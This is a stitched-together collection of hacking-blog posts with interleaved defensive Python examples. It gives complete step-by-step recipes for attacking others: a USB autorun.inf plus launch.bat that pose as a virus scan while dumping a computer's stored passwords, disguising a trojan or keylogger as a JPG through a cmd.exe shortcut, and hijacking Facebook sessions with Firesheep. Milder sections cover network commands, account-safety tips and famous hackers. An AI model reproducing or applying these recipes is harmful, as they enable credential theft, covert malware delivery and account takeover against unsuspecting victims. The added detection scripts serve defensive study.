How to Sniff Passwords Using USB Drive

As we all know, Windows stores most of the passwords that are used on a daily basis, including instant messenger passwords for MSN, Yahoo, AOL, Windows Messenger, etc. Along with these, Windows also stores passwords for Outlook Express, SMTP, POP and FTP accounts and the auto-complete passwords of browsers like IE and Firefox. There exist many tools for recovering these passwords from the places where they are stored. Using these tools and a USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step-by-step procedure to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all 5 tools, extract them and copy only the executables (.exe files) onto your USB pendrive.

i.e. copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe onto your USB drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt 

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on any computer to sniff the stored passwords. Just follow these steps:

1. Insert the pendrive and the autorun window will pop up. (This is because we have created an autorun pendrive.)

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

NOTE: This procedure will only recover the stored passwords (if any) on the computer.

This hack works on Windows 2000, XP and Vista.

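A defender's counterpart to the two files described above, as an added example that is not part of the original post: a small Python script that reads autorun.inf from a drive root, reports what its open= entry would launch, flags an ACTION= label that imitates a security prompt, and lists the programs the referenced launcher batch file would start. The sample autorun.inf and launch.bat strings are constructed to match the text above; the scan_drive_root helper and the word list in SUSPICIOUS_LABEL are this example's own choices, not anything the post specifies.

```python
import configparser
import os
import re

# Constructed samples matching the two files the post describes (not read from any real drive)
SAMPLE_AUTORUN_INF = """[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
"""
SAMPLE_LAUNCH_BAT = """start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
"""

# autorun.inf keys that make a program run on insertion or when the AutoPlay entry is chosen
LAUNCH_KEYS = ("open", "shellexecute")
# Words that make an AutoPlay entry look like a security prompt (heuristic, this example's own list)
SUSPICIOUS_LABEL = re.compile(r"scan|virus|antivirus|security|update|install", re.I)


def parse_autorun(text):
    """Return the [autorun] section of an autorun.inf as a dict with lower-cased keys."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}  # not a well-formed INI file at all
    if not cp.has_section("autorun"):
        return {}
    return {key.lower(): value.strip() for key, value in cp.items("autorun")}


def launched_programs(batch_text):
    """List the executables a launcher batch file runs (simplified: 'start prog ...' or 'prog ...')."""
    programs = []
    for line in batch_text.splitlines():
        parts = line.strip().split()
        if not parts or parts[0].lower() in ("rem", "::", "@echo", "echo"):
            continue
        if parts[0].lower() == "start":
            parts = parts[1:]
        if parts:
            programs.append(parts[0].lower())
    return programs


def assess_autorun(autorun_text, launcher_text=None):
    """Return human-readable findings for an autorun.inf and, optionally, the launcher it points to."""
    findings = []
    entries = parse_autorun(autorun_text)
    for key in LAUNCH_KEYS:
        if key in entries:
            findings.append(f"autorun.inf '{key}' runs {entries[key]} via AutoRun/AutoPlay")
    label = entries.get("action", "")
    if SUSPICIOUS_LABEL.search(label):
        findings.append(f"AutoPlay label imitates a security prompt: {label!r}")
    if launcher_text is not None:
        for program in launched_programs(launcher_text):
            findings.append(f"launcher starts {program}")
    return findings


def scan_drive_root(root):
    """Check the root of a mounted drive for autorun.inf and its launcher; returns findings."""
    inf_path = os.path.join(root, "autorun.inf")
    if not os.path.isfile(inf_path):
        return []
    with open(inf_path, encoding="utf-8", errors="replace") as fh:
        autorun_text = fh.read()
    launcher_text = None
    target = parse_autorun(autorun_text).get("open")
    if target and os.path.isfile(os.path.join(root, target)):
        with open(os.path.join(root, target), encoding="utf-8", errors="replace") as fh:
            launcher_text = fh.read()
    return assess_autorun(autorun_text, launcher_text)


if __name__ == "__main__":
    for finding in assess_autorun(SAMPLE_AUTORUN_INF, SAMPLE_LAUNCH_BAT):
        print(finding)
```

Run scan_drive_root("E:\\") (or the mount point on another OS) against a drive you do not trust before opening anything on it. Note that on Windows 7 and later, and on XP/Vista with Microsoft update KB971029 applied, AutoRun is ignored for removable drives that are not optical media, so the open= entry above no longer fires on its own; setting NoDriveTypeAutoRun to 0xFF under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer disables AutoRun for every drive type.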

BlackSheep – Detect Users Of FireSheep On The Network

As you surely know, things blew up recently at Toorcon 12 with the release of the much talked about Firefox plugin called Firesheep.

There were various discussions about how to mitigate against it like using Firefox plug-ins to force SSL connections (where available). Microsoft also tried to secure Hotmail with SSL but kinda b0rked that too.

For the 1 person in the World left that doesn’t know, Firesheep allowed any user to seamlessly hijack the web session of another user on the same local network. Although such attacks are not new, the ease of use presented by Firesheep brought session hijacking to the masses.

BlackSheep, also a Firefox plugin, is designed to combat Firesheep. BlackSheep does this by dropping 'fake' session ID information on the wire and then monitoring traffic to see if it has been hijacked. While Firesheep is largely passive, once it identifies session information for a targeted domain it makes a subsequent request to that same domain, using the hijacked session information, in order to obtain the name of the hijacked user along with an image of the person, if available. It is this request that BlackSheep identifies in order to detect the presence of Firesheep on the network. When identified, the user will receive the following warning message:

It should be noted that Firesheep and BlackSheep cannot be installed on the same Firefox instance as they share much of the same code base. If you want to run both Firesheep and BlackSheep on the same machine, they should be installed in separate Firefox profiles.

Requirements

In order to install BlackSheep, you need:

  • Mac OS X: 10.5 or newer on an Intel processor.
  • Windows: XP or newer. Install Winpcap first!
  • Firefox: 3.5 or newer. 32-bit only.
  • Linux: details here

You can download BlackSheep here:

blacksheep-latest.xpi

Network Hacking

Network hacking generally means gathering information about a domain by using tools like Telnet, Nslookup, Ping, Tracert, Netstat, etc.
It also includes OS fingerprinting, port scanning and port surfing using various tools.

Ping :- Ping uses ICMP (Internet Control Message Protocol) echo messages and is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check whether a host is alive or not.
To ping a particular host the syntax is (at the command prompt):

C:\>ping hostname.com

example:- C:\>ping www.google.com

The various options used with the 'Ping' command and their usage can be viewed by just typing C:\>ping at the command prompt.

Netstat :- It displays protocol statistics and current TCP/IP network connections, i.e. local address, remote address, port number, etc.
Its syntax is (at the command prompt):

C:\>netstat -n

The IP addresses are also shown, but I am hiding my IP here for security purposes.

Telnet :- Telnet is a program that runs over TCP/IP. Using it we can connect to a remote computer on a particular port. When connected, it shows the banner of the daemon running on that port.
The basic syntax of Telnet is (at the command prompt):

C:\>telnet hostname.com

By default telnet connects to port 23 of the remote computer.
So, the complete syntax is:

C:\>telnet www.hostname.com port

Tracert :- It is used to trace the route taken by certain information, i.e. data packets, from source to destination.
Its syntax is (at the command prompt):

example:- C:\>tracert www.insecure.in

Here "*    *    *    Request timed out." indicates that a firewall installed on that system blocks the request and hence we can't obtain its IP address.

The various options used with the tracert command and their usage can be viewed by just typing C:\>tracert at the command prompt.

The information obtained by using the tracert command can be further used to find out the exact operating system running on the target system.

example:- C:\>telnet www.yahoo.com 21 or C:\>telnet 192.168.0.5 21
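The netstat section above shows the raw output but says nothing about what to do with it. As an added example (not from the original article), here is a Python parser for Windows netstat -an output that turns each row into a record and then answers the questions an administrator actually asks of it: which TCP ports are listening on this host, which established connections go to remote ports you did not expect, and how many connections each remote host holds. The sample output is constructed for the example and the expected-port set is an assumption you should adjust for your own environment.

```python
import re
from collections import Counter

# Constructed sample of Windows 'netstat -an' output (not captured from a real machine)
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    192.168.0.5:49152      93.184.216.34:443      ESTABLISHED
  TCP    192.168.0.5:49153      93.184.216.34:443      ESTABLISHED
  TCP    192.168.0.5:49154      198.51.100.7:6667      ESTABLISHED
  TCP    192.168.0.5:49155      203.0.113.9:21         TIME_WAIT
  UDP    0.0.0.0:5353           *:*
"""

# One row: protocol, local endpoint, foreign endpoint, optional state (UDP rows have none)
ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+(\S+))?\s*$")

# Remote ports this host is expected to talk to (assumption; tune per environment)
EXPECTED_REMOTE_PORTS = {"53", "80", "443"}


def split_endpoint(endpoint):
    """'192.168.0.5:49152' -> ('192.168.0.5', '49152'); also handles '[::]:135' and '*:*'."""
    host, _, port = endpoint.rpartition(":")
    return host, port


def parse_netstat(text):
    """Turn netstat output into a list of connection dicts; banner and header lines are skipped."""
    connections = []
    for line in text.splitlines():
        match = ROW.match(line)
        if not match:
            continue
        proto, local, remote, state = match.groups()
        local_host, local_port = split_endpoint(local)
        remote_host, remote_port = split_endpoint(remote)
        connections.append({
            "proto": proto,
            "local_host": local_host, "local_port": local_port,
            "remote_host": remote_host, "remote_port": remote_port,
            "state": state or "",
        })
    return connections


def listening_ports(connections):
    """TCP ports with a listener: the ones a port scan of this host would find."""
    return sorted({c["local_port"] for c in connections if c["state"] == "LISTENING"}, key=int)


def unexpected_remotes(connections, expected=EXPECTED_REMOTE_PORTS):
    """Established TCP connections to remote ports outside the expected set."""
    return [
        (c["remote_host"], c["remote_port"])
        for c in connections
        if c["proto"] == "TCP" and c["state"] == "ESTABLISHED" and c["remote_port"] not in expected
    ]


def connections_per_remote(connections):
    """Count established connections per remote host."""
    return Counter(c["remote_host"] for c in connections if c["state"] == "ESTABLISHED")


if __name__ == "__main__":
    conns = parse_netstat(SAMPLE_NETSTAT)
    print("listening:", listening_ports(conns))
    print("unexpected:", unexpected_remotes(conns))
    print("per remote:", connections_per_remote(conns))
```

Feed it real output with parse_netstat(subprocess.check_output(["netstat", "-an"], text=True)); the remote-port check is deliberately simple and is meant as a first pass before looking up the owning process with netstat -ano.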

Hide EXE File into JPG

This is a good trick to hide your exe files into a jpg file..!

How about sending a trojan or a keylogger into your victim using this trick..??

1) First, create a new folder and make sure that the option 'show hidden files and folders' is checked and 'hide extensions for known file types' is unchecked.
Basically what you need is to see hidden files and the extensions of all the files on your PC.

2) Paste a copy of your server into the newly created folder. Let's say it's called 'server.exe' (that's why you need file extensions showing, because you need to see it to change it).

3) Now you’re going to rename this ‘server.exe’ to whatever you want, let’s say for example ‘picture.jpeg’

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this ‘picture.jpeg’ in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, ‘me.jpeg’.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field ‘Start In’ and leave it empty.

9) Then on field ‘Target’ you need to write the path to open the other file (the server renamed ‘picture.jpeg’) so you have to write this :-
‘C:\WINDOWS\system32\cmd.exe /c picture.jpeg’

10) The last field, 'c picture.jpeg', is always the name of the first file. If you called the first file 'soccer.avi' you have to write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on ‘me.jpeg’, a cmd will execute the other file ‘picture.jpeg’ and the server will run.

12) On that file ‘me.jpeg’ (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties ‘Hidden’ for the first file ‘picture.jpeg’ if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me, for example, I always want the shortcut showing first so it can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set the hidden property on the server 'picture.jpeg' then you don't have to bother with this detail, but I'm warning you, the hidden file will always show up inside a Zip or RAR file.

16) So the best way to send these files together to someone is to compress them into a Zip or RAR.

17) Inside the RAR or Zip file you can see the file properties, and even after all this work you can see that the shortcut is recognized as a shortcut, but hopefully the person you sent this to doesn't know that and is going to open it.
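Step 17 admits the weak point of this trick: the archive still contains a renamed executable and a shortcut, and a shortcut to cmd.exe is not an image. As an added example (not part of the original post), here is a Python check that identifies files by their leading bytes instead of their names, flags an executable whose name claims to be an image, recognizes a Windows shortcut by its header (HeaderSize 0x4C plus the LinkCLSID), reports when the shortcut's displayed name looks like an image, and looks for cmd.exe in the shortcut's target in both the ANSI and UTF-16LE encodings that .lnk files use. The FAKE_PE, FAKE_LNK and REAL_JPEG byte strings are constructed for the example, and FAKE_LNK is only a header plus a target string, not a complete shortcut.

```python
import os

LNK_MAGIC = (b"\x4c\x00\x00\x00"                    # HeaderSize = 0x4C
             b"\x01\x14\x02\x00\x00\x00\x00\x00"    # LinkCLSID 00021401-0000-0000-
             b"\xc0\x00\x00\x00\x00\x00\x00\x46")   # C000-000000000046
SIGNATURES = [
    (b"MZ", "pe-executable"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF8", "gif"),
    (LNK_MAGIC, "lnk"),
]
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}
EXECUTABLE_EXTS = {".exe", ".dll", ".scr", ".sys", ".cpl", ".ocx"}
# Strings a shortcut carries when its target is cmd.exe launching another file
LNK_NEEDLES = ["cmd.exe", "/c "]

# Constructed samples (not real files): a fake PE stub, a minimal shortcut header followed by
# the target string from the post, and a JPEG header.
FAKE_PE = b"MZ" + b"\x90" * 62
FAKE_LNK = LNK_MAGIC + b"\x00" * 56 + "C:\\WINDOWS\\system32\\cmd.exe /c picture.jpeg".encode("utf-16-le")
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"


def sniff_type(data):
    """Identify a file by its leading bytes rather than by its name."""
    for magic, kind in SIGNATURES:
        if data.startswith(magic):
            return kind
    return "unknown"


def lnk_mentions(data):
    """Needle strings present in a shortcut, in ANSI or UTF-16LE form (the encodings .lnk uses)."""
    return [n for n in LNK_NEEDLES if n.encode("ascii") in data or n.encode("utf-16-le") in data]


def assess_file(name, data):
    """Return findings for one file from its name and its leading bytes."""
    findings = []
    ext = os.path.splitext(name)[1].lower()
    kind = sniff_type(data)
    if kind == "pe-executable" and ext not in EXECUTABLE_EXTS:
        findings.append(f"{name}: content is a PE executable but the name ends in {ext or '(none)'}")
    if kind == "lnk":
        # Explorer never shows the .lnk extension, so 'me.jpeg.lnk' is displayed as 'me.jpeg'
        shown = name[:-4] if ext == ".lnk" else name
        if os.path.splitext(shown)[1].lower() in IMAGE_EXTS:
            findings.append(f"{name}: shortcut displayed as an image file ({shown})")
        hits = lnk_mentions(data)
        if hits:
            findings.append(f"{name}: shortcut target references {', '.join(hits)}")
    return findings


def scan_directory(path):
    """Assess every regular file in a directory, e.g. the contents of an extracted Zip or RAR."""
    findings = []
    for entry in sorted(os.listdir(path)):
        full = os.path.join(path, entry)
        if os.path.isfile(full):
            with open(full, "rb") as fh:
                findings.extend(assess_file(entry, fh.read(65536)))
    return findings


if __name__ == "__main__":
    for name, data in (("picture.jpeg", FAKE_PE), ("me.jpeg.lnk", FAKE_LNK), ("photo.jpg", REAL_JPEG)):
        print(name, assess_file(name, data))
```

Point scan_directory at the folder an archive was extracted into; the two findings for the shortcut correspond exactly to steps 6 and 9 above, which is why an archive's file listing gives this trick away.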

Rename A Start Button – Windows xp

To rename the Start button, all you need to do is download Resource Hacker.

Resource Hacker™ is a freeware utility to view, modify, rename, add, delete and extract resources in 32-bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Win95, Win98, WinME, WinNT, Win2000 and WinXP operating systems.

To Download Click here

First Step: The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer.exe. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe.
The category we are going to be using is String Table in Resource Hacker. Expand it by clicking the plus sign, then navigate down to and expand string 37, followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right-hand pane will display the string table as shown in the figure. We're going to modify item 578, currently showing the word "start" just as it displays on the current Start button.

There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry.

Compile and save (actually save as) with another name like expmann.exe

Second Step: Modify the Registry. Now that the modified expmann.exe has been created, it's necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don't know how to access the registry I'm not sure this article is for you, but just in case it's a temporary memory lapse, go to Start (soon to be something else) > Run and type regedit in the Open: field. Navigate to:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

In the right pane, double-click the Shell entry to open the Edit String dialog box as shown in the figure. In the Value data: line, enter the name that was used to save the modified expmann.exe file. Click OK.

Close Registry Editor and reboot the entire system. If all went as planned you should see your new Start button with the revised text.

Firesheep Makes Facebook Hacking Easy

Recently a new Firefox add-on, Firesheep, has been the cause of thousands of email accounts being compromised. As reported by TechCrunch, Firesheep has been downloaded more than 104,000 times in roughly the last 24 hours. With Firesheep the hacker can control any account without even knowing the username and password of the desired account. As Facebook is the world's most popular social networking website, it has been the major victim. Firesheep uses an HTTP session hijacking attack to gain unauthorized access to a Facebook or any other account.

What is Session Hijacking?

In an HTTP session hijacking attack the attacker steals the victim's cookies. Cookies store all the necessary information about one's account; using this information you can hack anybody's account and change their password. If you get the victim's cookies you can hack any account the victim is logged into, i.e. you can hack Facebook, Google, Yahoo, Orkut, Flickr, etc. or any other email account.

How can a Hacker use Firesheep to Hack a Facebook or any other account?

Now I will tell you how a hacker can use Firesheep to hack a Facebook or any other account. You will need the following things:

Method

1. First of all, download "Firesheep" from the above link and use the "open with" option in the Firefox browser.

2. Once you have installed Firesheep in the Firefox web browser, click on View at the top, then go to Sidebar and click on Firesheep.

3. Now click on the top-left button "Start capturing" and it will start to capture the session cookies of people on your Wi-Fi network. This will show you the list of those people whose cookies have been captured and who have visited an unsecured website known to Firesheep. Double-click on the photo and you will be logged in instantly.
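Both the BlackSheep section and the "What is Session Hijacking?" explanation above come down to the same fact: the site sent its session cookie over plain HTTP, so anyone on the same network could read it. BlackSheep detects a hijacker after the fact; the server-side fix is to make sure the cookie is never sent in the clear. As an added example (not from the original article), here is a Python audit of a response's Set-Cookie and Strict-Transport-Security headers that reports a cookie lacking the Secure flag, a session cookie lacking HttpOnly or SameSite, and a site without HSTS. The WEAK_RESPONSE and HARDENED_RESPONSE header lists are constructed for the example, and the SESSION_NAME_HINT pattern for spotting session cookies by name is this example's own heuristic.

```python
import re

# Constructed sample responses; neither was captured from a real site.
WEAK_RESPONSE = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "sessionid=3f9a1c; Path=/"),
    ("Set-Cookie", "theme=dark; Path=/"),
]
HARDENED_RESPONSE = [
    ("Content-Type", "text/html"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Set-Cookie", "sessionid=3f9a1c; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ("Set-Cookie", "theme=dark; Path=/; Secure"),
]

# Cookie names that usually carry login state (heuristic; adjust for your application)
SESSION_NAME_HINT = re.compile(r"sess|sid|auth|token|login", re.I)


def parse_set_cookie(value):
    """Split a Set-Cookie header value into (name, value, {attribute: value})."""
    parts = [part.strip() for part in value.split(";")]
    name, _, cookie_value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, attr_value = part.partition("=")
        attrs[key.strip().lower()] = attr_value.strip()
    return name.strip(), cookie_value, attrs


def audit_cookie(value):
    """Return (cookie name, list of issues) for one Set-Cookie header."""
    name, _, attrs = parse_set_cookie(value)
    issues = []
    if "secure" not in attrs:
        # Without Secure the browser also sends the cookie over plain HTTP,
        # which is exactly the traffic a sniffer on a shared network reads.
        issues.append("missing Secure")
    if SESSION_NAME_HINT.search(name):
        if "httponly" not in attrs:
            issues.append("missing HttpOnly on a session cookie")
        if "samesite" not in attrs:
            issues.append("missing SameSite on a session cookie")
    return name, issues


def audit_response(headers):
    """Audit a list of (header, value) pairs; returns HSTS status and per-cookie issues."""
    report = {"hsts": False, "cookies": {}}
    for header, value in headers:
        if header.lower() == "strict-transport-security":
            # HSTS stops the browser from making the plain-HTTP request
            # that would leak an unflagged cookie in the first place.
            report["hsts"] = True
        elif header.lower() == "set-cookie":
            name, issues = audit_cookie(value)
            report["cookies"][name] = issues
    return report


def resists_session_sniffing(headers):
    """True when HSTS is set and no cookie in the response has an issue."""
    report = audit_response(headers)
    return report["hsts"] and not any(report["cookies"].values())


if __name__ == "__main__":
    for label, headers in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response(headers))
```

To audit a live site, pass response.headers.items() from a urllib or requests response to audit_response; the Secure flag plus HSTS is what removes the plain-HTTP cookie that Firesheep captured, and HttpOnly and SameSite cover the other common ways a session cookie leaves the browser.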

Prevent Your Account from Hackers

Here I will be discussing how you can protect your accounts from hackers, or to use the right word, crackers.

1. Beware of Phishing :-

Phishing is one of the most widely used and simplest ways of gaining access to one's account through hacking. Phishers are pages which are uploaded to hosting sites and then given away to victims.

In appearance the phisher looks exactly like your usual login page.

For example, take an Orkut account: you receive a link from someone asking you to click on it.

Now when you click on that link, it takes you to a new page that looks like your Orkut account login page.

Don't be fooled by that. Most people will, without a second thought, enter their username and passcode and press Enter. But you will not be logged into your account. It is a phisher; your login info will be sent to the person who sent you the link.

So no matter who the person is and however trustworthy they seem, do not log in on any other page except.

Otherwise your account might be on the verge of getting hacked.

Phishing done in another way

Many times phishers will send you a mail to your email ID from an ID like "gmailpasswordrecovere" etc., telling you to verify your account or else your account will be deleted.

Don't ever log in at any page other than the original website.

2. Keep a strong password :-

Always have a passcode with many characters, minimum 6 characters, having a combination of small and capital letters, numbers and special characters like "$". Then there are very minimal chances that your passcode will be hacked.

3. Keyloggers :-

Many times you make online friends that you do not know personally. Then after many chats the person tells you he created a game and wants you to see it and give a review. You gladly accept it; the game might actually be a keylogger. Keyloggers have become very common nowadays. Now when you double-click on the keylogger it gets activated. The next time you log in to any page your username and passcode will be sent to the other guy.

So do not accept such things from people you do not trust very much.

4. Keeping your antivirus up to date :-

Many people believe that antiviruses do nothing and hence they do not install them, and think that if a virus infects their PC then they will format the PC. But this is wrong; whenever a virus enters your PC there is a very strong possibility that a bad sector is created on your PC. Antiviruses thus protect your PC.

Most famous Black Hat Hackers

This article is about the most famous black hat hackers in the world.

1. Jonathan James:

James gained notoriety when he became the first juvenile to be sent to prison for hacking. He was sentenced at 16 years old. In an anonymous PBS interview, he professes, "I was just looking around, playing around. What was fun for me was a challenge to see what I could pull off."

James's major intrusions targeted high-profile organizations. He installed a backdoor into a Defense Threat Reduction Agency server. The DTRA is an agency of the Department of Defense charged with reducing the threat to the U.S. and its allies from nuclear, biological, chemical, conventional and special weapons. The backdoor he created enabled him to view sensitive emails and capture employee usernames and passwords.

James also cracked into NASA computers, stealing software worth approximately $1.7 million. According to the Department of Justice, “The software supported the International Space Station’s physical environment, including control of the temperature and humidity within the living space.” NASA was forced to shut down its computer systems, ultimately racking up a $41,000 cost. James explained that he downloaded the code to supplement his studies on C programming, but contended, “The code itself was crappy . . . certainly not worth $1.7 million like they claimed.”

Given the extent of his intrusions, if James, also known as “c0mrade,” had been an adult he likely would have served at least 10 years. Instead, he was banned from recreational computer use and was slated to serve a six-month sentence under house arrest with probation. However, he served six months in prison for violation of parole. Today, James asserts that he’s learned his lesson and might start a computer security company.

2. Adrian Lamo:

Lamo's claim to fame is his break-ins at major organizations like The New York Times and Microsoft. Dubbed the "homeless hacker," he used Internet connections at Kinko's, coffee shops and libraries to do his intrusions. In a profile article, "He Hacks by Day, Squats by Night," Lamo reflects, "I have a laptop in Pittsburgh, a change of clothes in D.C. It kind of redefines the term multi-jurisdictional."

Lamo's intrusions consisted mainly of penetration testing, in which he found flaws in security, exploited them and then informed companies of their shortcomings. His hits include Yahoo!, Bank of America, Citigroup and Cingular. When white hat hackers are hired by companies to do penetration testing, it's legal. What Lamo did is not.

When he broke into The New York Times’ intranet, things got serious. He added himself to a list of experts and viewed personal information on contributors, including Social Security numbers. Lamo also hacked into The Times’ LexisNexis account to research high-profile subject matter.

For his intrusion at The New York Times, Lamo was ordered to pay approximately $65,000 in restitution. He was also sentenced to six months of home confinement and two years of probation, which expired January 16, 2007. Lamo is currently working as an award-winning journalist and public speaker.

3. Kevin Mitnick:

A self-proclaimed "hacker poster boy," Mitnick went through a highly publicized pursuit by authorities. His mischief was hyped by the media but his actual offenses may be less notable than his notoriety suggests. The Department of Justice describes him as "the most wanted computer criminal in United States history." His exploits were detailed in two movies: Freedom Downtime and Takedown.

Mitnick had a bit of hacking experience before committing the offenses that made him famous. He started out exploiting the Los Angeles bus punch card system to get free rides. Then, like Apple co-founder Steve Wozniak, he dabbled in phone phreaking. Although there were numerous offenses, Mitnick was ultimately convicted for breaking into the Digital Equipment Corporation's computer network and stealing software.

Mitnick’s mischief got serious when he went on a two and a half year “coast-to-coast hacking spree.” The CNN article, “Legendary computer hacker released from prison,” explains that “he hacked into computers, stole corporate secrets, scrambled phone networks and broke into the national defense warning system.” He then hacked into computer expert and fellow hacker Tsutomu Shimomura’s home computer, which led to his undoing.

Today, Mitnick has been able to move past his role as a black hat hacker and become a productive member of society. He served five years, about 8 months of it in solitary confinement, and is now a computer security consultant, author and speaker.


White Hat vs Black Hat

This article is about computer hackers.

White hat

A white hat is the hero or good guy, especially in computing slang, where it refers to an ethical hacker or penetration tester who focuses on securing and protecting IT systems.

White hat hackers are computer security experts, who specialize in penetration testing, and other testing methodologies, to ensure that a company’s information systems are secure. White hat hackers are also called “sneakers”, red teams, or tiger teams. These security experts may utilize a variety of methods to carry out their tests, including social engineering tactics, use of hacking tools, such as Metasploit, which exploits known vulnerabilities, and attempts to evade security to gain entry into secured areas.

Black hat

Black hat is used to describe a hacker (or, if you prefer, cracker) who breaks into a computer system or network with malicious intent. Unlike a white hat hacker, the black hat hacker takes advantage of the break-in, perhaps destroying files or stealing data for some future purpose. The black hat hacker may also make the exploit known to other hackers and/or the public without notifying the victim. This gives others the opportunity to exploit the vulnerability before the organization is able to secure it.